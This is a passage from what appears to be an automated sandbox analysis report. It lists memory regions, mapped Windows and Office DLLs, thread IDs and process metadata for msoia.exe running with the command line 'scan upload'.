"pagefile_0x0000000002480000" filename = "" Region: id = 4478 start_va = 0x7fef93b0000 end_va = 0x7fef93b8fff entry_point = 0x7fef93b0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 4741 start_va = 0x2490000 end_va = 0x2491fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002490000" filename = "" Region: id = 4742 start_va = 0x3d50000 end_va = 0x3d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4743 start_va = 0x3e50000 end_va = 0x3f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 4744 start_va = 0x3f60000 end_va = 0x405ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f60000" filename = "" Region: id = 4745 start_va = 0x4060000 end_va = 0x425ffff entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 4746 start_va = 0x43a0000 end_va = 0x441ffff entry_point = 0x0 region_type = private name = "private_0x00000000043a0000" filename = "" Region: id = 4747 start_va = 0x4540000 end_va = 0x463ffff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 4748 start_va = 0x46d0000 end_va = 0x47cffff entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 4749 start_va = 0x47d0000 end_va = 0x4bcffff entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 4750 start_va = 0x7fef96b0000 end_va = 0x7fef9702fff entry_point = 0x7fef96b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4751 start_va = 0x7fefbc10000 end_va = 0x7fefbc17fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4752 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4753 start_va = 0x7fefd0c0000 end_va = 0x7fefd10bfff entry_point = 0x7fefd0c0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4754 start_va = 0x7fefd210000 end_va = 0x7fefd266fff entry_point = 0x7fefd210000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 4755 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4756 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4757 start_va = 0x7fefd5f0000 end_va = 0x7fefd611fff entry_point = 0x7fefd5f0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4758 start_va = 0x7fefd620000 end_va = 0x7fefd66dfff entry_point = 0x7fefd620000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4759 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4760 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4761 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4762 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 4763 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Thread: id = 194 os_tid = 0x4f4 Thread: id = 203 os_tid = 0xbc0 Thread: id = 205 os_tid = 0xbb8 Thread: id = 209 os_tid = 0x5e0 Thread: id = 224 os_tid = 0x87c Thread: id = 227 os_tid = 0xaa0 Thread: id = 228 os_tid = 0xaa8 Thread: id = 229 os_tid = 0xaac Thread: id = 232 os_tid = 0xab4 Thread: id = 234 os_tid = 0xa84 Thread: id = 237 os_tid = 0xa64 Thread: id = 239 os_tid = 0xa60 Thread: id = 242 os_tid = 0x714 Thread: id = 244 os_tid = 0x1c4 Thread: id = 296 os_tid = 0x988 Thread: id = 299 os_tid = 0xa88 Process: id = "29" image_name = "msoia.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\msoia.exe" page_root = "0x6a72c000" os_pid = "0x75c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0x638" cmd_line = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\" scan upload" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3857 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3858 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3859 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3860 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3861 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3862 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3863 start_va = 0x13f830000 end_va = 0x13fb71fff entry_point = 0x13f830000 region_type = mapped_file name = "msoia.exe" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msoia.exe") Region: id = 3864 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3865 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3866 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3867 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4009 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4010 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4011 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4012 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 4013 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4014 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4015 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 4016 start_va = 0x4b0000 end_va = 0x637fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 4017 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 4018 start_va = 0x6a0000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 4019 start_va = 0x830000 end_va = 0x1c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 4020 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4021 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4022 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4023 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4024 start_va = 0x7fef8370000 end_va = 0x7fef8559fff entry_point = 0x7fef8370000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 4025 start_va = 0x7fef8560000 end_va = 0x7fef8799fff entry_point = 0x7fef8560000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 4026 start_va = 0x7fefaa80000 end_va = 0x7fefaa82fff entry_point = 0x7fefaa80000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 4027 start_va = 0x7fefaa90000 end_va = 0x7fefaa92fff entry_point = 0x7fefaa90000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 4028 start_va = 0x7fefaaa0000 end_va = 0x7fefaaa2fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 4029 start_va = 0x7fefaab0000 end_va = 0x7fefaab2fff entry_point = 0x7fefaab0000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 4030 start_va = 0x7fefaac0000 end_va = 0x7fefaac4fff entry_point = 0x7fefaac0000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 4031 start_va = 0x7fefaad0000 end_va = 0x7fefaad4fff entry_point = 0x7fefaad0000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 4032 start_va = 0x7fefaae0000 end_va = 0x7fefaae2fff entry_point = 0x7fefaae0000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 4033 start_va = 0x7fefaaf0000 end_va = 0x7fefab8bfff entry_point = 0x7fefaaf0000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 4034 start_va = 0x7fefab90000 end_va = 0x7fefab93fff entry_point = 0x7fefab90000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 4035 start_va = 0x7fefaba0000 end_va = 0x7fefaba3fff entry_point = 0x7fefaba0000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 4036 start_va = 0x7fefabb0000 end_va = 0x7fefabb2fff entry_point = 0x7fefabb0000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 4037 start_va = 0x7fefabc0000 end_va = 0x7fefabc3fff entry_point = 0x7fefabc0000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 4038 start_va = 0x7fefabd0000 end_va = 0x7fefabd2fff entry_point = 0x7fefabd0000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 4039 start_va = 0x7fefabe0000 end_va = 0x7fefabe2fff entry_point = 0x7fefabe0000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 4040 start_va = 0x7fefabf0000 end_va = 0x7fefabf2fff entry_point = 0x7fefabf0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 4041 start_va = 0x7fefac00000 end_va = 0x7fefac02fff entry_point = 0x7fefac00000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 4042 start_va = 0x7fefac10000 end_va = 0x7fefac12fff entry_point = 0x7fefac10000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 4043 start_va = 0x7fefac20000 end_va = 0x7fefac22fff entry_point = 0x7fefac20000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 4044 start_va = 0x7fefac30000 end_va = 0x7fefad21fff entry_point = 0x7fefac30000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4045 start_va = 0x7fefad30000 end_va = 0x7fefad33fff entry_point = 0x7fefad30000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 4046 start_va = 0x7fefad40000 end_va = 0x7fefad55fff entry_point = 0x7fefad40000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 4047 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4048 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4049 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4050 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4051 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4052 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4053 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4054 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4055 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4056 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4057 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4058 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4059 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4060 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4061 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4062 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4129 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4130 start_va = 0x1e0000 end_va = 0x1e6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4131 start_va = 0x2f0000 end_va = 0x2f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 4132 start_va = 0x1c30000 end_va = 0x1efefff entry_point = 0x1c30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4133 start_va = 0x1f00000 end_va = 0x22f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f00000" filename = "" Region: id = 4134 start_va = 0x37c80000 end_va = 0x37c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000037c80000" filename = "" Region: id = 4135 start_va = 0x7febdd50000 end_va = 0x7febdd5ffff entry_point = 0x0 region_type = private name = "private_0x000007febdd50000" filename = "" Region: id = 4230 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 4231 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4232 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 4233 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 4234 start_va = 0x2300000 end_va = 0x23fffff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 4235 start_va = 0x2460000 end_va = 0x24dffff entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 4236 start_va = 0x24e0000 end_va = 0x25befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024e0000" filename = "" Region: id = 4237 start_va = 0x25c0000 end_va = 0x26bffff entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 4238 start_va = 0x26c0000 end_va = 0x27bffff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 4239 start_va = 0x28e0000 end_va = 0x29dffff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 4240 start_va = 0x7fef5ff0000 end_va = 0x7fef6063fff entry_point = 0x7fef5ff0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4241 start_va = 0x7fefa530000 end_va = 0x7fefa74cfff entry_point = 0x7fefa530000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 4242 start_va = 0x7fefa750000 end_va = 0x7fefaa65fff entry_point = 0x7fefa750000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 4243 start_va = 0x7fefb800000 end_va = 0x7fefb814fff entry_point = 0x7fefb800000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4244 start_va = 0x7fefc4b0000 end_va = 0x7fefc505fff entry_point = 0x7fefc4b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4245 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4246 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4247 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4248 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4249 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4250 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4251 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4377 start_va = 0x27e0000 end_va = 0x28dffff entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 4378 start_va = 0x2a90000 end_va = 0x2b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 4379 start_va = 0x2bc0000 end_va = 0x2bcffff entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 4380 start_va = 0x2bd0000 end_va = 0x2ccffff entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 4381 start_va = 0x2cd0000 end_va = 0x2d8ffff entry_point = 0x2cd0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4382 start_va = 0x2e60000 end_va = 0x2f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 4383 start_va = 0x77e10000 end_va = 0x77e12fff entry_point = 0x77e10000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 4384 start_va = 0x7fef59c0000 end_va = 0x7fef59cbfff entry_point = 0x7fef59c0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4385 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4386 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4387 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4388 start_va = 0x7fef9680000 end_va = 0x7fef9690fff entry_point = 0x7fef9680000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4389 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") 